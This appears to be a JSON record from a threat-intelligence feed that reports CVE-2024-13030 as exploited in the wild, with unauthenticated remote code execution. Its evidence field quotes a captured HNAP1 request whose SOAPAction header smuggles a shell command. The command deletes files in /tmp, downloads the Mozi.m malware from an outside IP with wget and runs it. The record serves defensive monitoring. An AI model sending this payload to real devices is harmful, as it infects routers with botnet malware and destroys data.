{"metadata": {"count": 1, "page": 1, "per_page": 100}, "data": [{"uuid": "7e778c2d-cf27-4c9c-9fe6-fc01102b5431", "vulnerability": {"vulnId": "CVE-2024-13030", "altId": []}, "gcve": {"origin_uuid": "1a89b78e-f703-45f3-bb86-59eb712668bd", "gna": 1, "object_uuid": "7e778c2d-cf27-4c9c-9fe6-fc01102b5431"}, "status": {"exploited": true, "status_reason": "confirmed", "status_updated_at": "2026-03-12T10:49:58+00:00"}, "characteristics": {"severity": 100.0, "local_access_required": false, "remote_code_execution": true, "authentication_required": false}, "timestamps": {"asserted_at": "2026-03-12T10:49:58", "last_seen_at": "2026-03-12T10:49:58", "first_seen_at": "2026-03-12T10:49:58"}, "scope": null, "evidence": [{"type": "sinkhole", "source": "cti-feed.circl.lu", "signal": "in_the_wild_attempts", "confidence": 1.0, "details": {"note": "OST /HNAP1/ HTTP/1.0\r\nHost: 193.168.113.145:80\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://180.243.2.45:51387/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n<soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\">\r\n<PortMappingDescription>foobar</PortMappingDescription>\r\n<InternalClient>192.168.0.100</InternalClient>\r\n<PortMappingProtocol>TCP</PortMappingProtocol>\r\n<ExternalPort>1234</ExternalPort>\r\n<InternalPort>1234</InternalPort>\r\n</AddPortMapping></soap:Body></soap:Envelope>"}}], "references": null}]}